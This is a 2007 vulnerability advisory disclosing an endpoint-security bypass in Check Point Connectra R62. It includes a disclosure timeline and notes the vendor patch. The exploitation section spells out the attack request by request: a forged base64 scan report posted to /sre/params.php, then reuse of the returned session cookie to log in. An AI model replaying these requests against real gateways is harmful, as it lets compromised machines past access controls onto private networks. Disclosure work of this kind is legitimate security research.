checkpoint-bypass.txt

`I. INTRODUCTION  
  
Check Point Connectra is a complete Web Security Gateway that provides  
SSL VPN access and comprehensive endpoint and integrated intrusion  
prevention   
Security in a single unified remote access solution. By combining both SSL  
VPN connectivity and security in one solution, organizations can effectively  
deploy SSL VPNs Safely and securely to a diverse set of remote users while  
ensuring the confidentiality and integrity of information that is critical  
to the success of any business.  
  
For more Information please refer to:  
http://www.checkpoint.com/products/connectra/index.html  
  
II. DESCRIPTION  
  
One of the major things in Check Point Connectra is Comprehensive endpoint  
security.  
Before a client connects to the internal network a test is being done on the  
client to check if there is any security hazard on his computer. If a hazard  
is detected the user is prompted with the hazard details and asked to run  
the test again before getting the ability to login to the network.  
  
A bypass to this test has been detected by Roni Bachar and Nir Goldshlager.  
A user with a security hazard or a Trojan can bypass the end point security  
tests and login to the network with a security hazard on his computer. The  
bypass is being done by sending a "good" report to the /sre/params.php page  
after sending the report a set cookie will be send from the server to the  
client. This cookie can be used to bypass the endpoint security findings.  
  
The bypass was detected on the latest version of checkpoint connectra R62.  
  
III. EXPLOITATION  
  
The vulnerability can be exploited by doing the following stages:  
  
Sending a post request as followed:  
  
POST https://serverip/sre/params.php HTTP/1.1  
Content-Type: application/x-www-form-urlencoded  
User-Agent: ICS_Secure   
Host: serverip  
Content-Length: 251  
Cache-Control: no-cache  
Cookie: ICS_Test_Cookie=1  
  
Report=PD94bWwgdmVyc2lvbj0iMS4wIj8+Cgo8U3JlU2NhblJlcG9ydCBWZXJzaW9uPSIzLjcuM  
TE2LjAiPgoJPFVzZXJJbmZvIFdpbkRvbWFpbj0iIiBXaW5Vc2VyPSJyb25pIiBXaW5Vc2VyQ2F0Y  
WxvZz0iQzpcRG9jdW1lbnRzIGFuZCBTZXR0aW5nc1xyb25pLkxFTk9WTy00RkZFRjRFMyIvPgo8L  
1NyZVNjYW5SZXBvcnQ+Cg==  
  
  
After sending the request a Set-Cookie will be received from the Check Point  
Connectra server  
  
HTTP/1.1 200 OK  
Date: Fri, 15 Dec 2006 17:16:19 GMT  
Server: CPWS  
Last-Modified: Fri, 15 Dec 2006 17:16:19 GMT  
Pragma: no-cache  
Cache-Control: no-cache  
Set-Cookie: ICSCookie=ffbe7a3740e0db1c2d11b2c6b24c917d; expires=Tue, 13 Sep  
2016 17:16:19 GMT; path=/; secure  
Content-Length: 0  
Content-Type: text/html  
  
This ICSCookie is needed to be enteredd into the next request  
  
GET https://serverip/Login/Login?LangCode= HTTP/1.1  
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,  
application/x-shockwave-flash, application/vnd.ms-excel,   
application/vnd.ms-powerpoint, application/msword, */*   
Accept-Language: en-us  
UA-CPU: x86  
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR  
1.1.4322; .NET CLR 2.0.50727)   
Host: serverip  
Connection: Keep-Alive  
Cookie: CheckCookieSupport=1; ICSCookie=ffbe7a3740e0db1c2d11b2c6b24c917d  
  
  
IV. WORKAROUND  
  
Check point released a patch for this vulnerability.  
  
  
V. DISCLOSURE TIMELINE  
  
20.12.06 First Identification of the flaw  
24.12.06 Reporting the flaw to checkpoint  
27.12.06 Meeting checkpoint security stuff   
22.01.07 Publishing the vulnerability.  
22.01.07 Checkpoint Released a patch for the vulnerability   
  
VI. CREDITS  
  
The vulnerability was discovered by Roni Bachar and Nir Goldshlager.  
  
  
  
  
`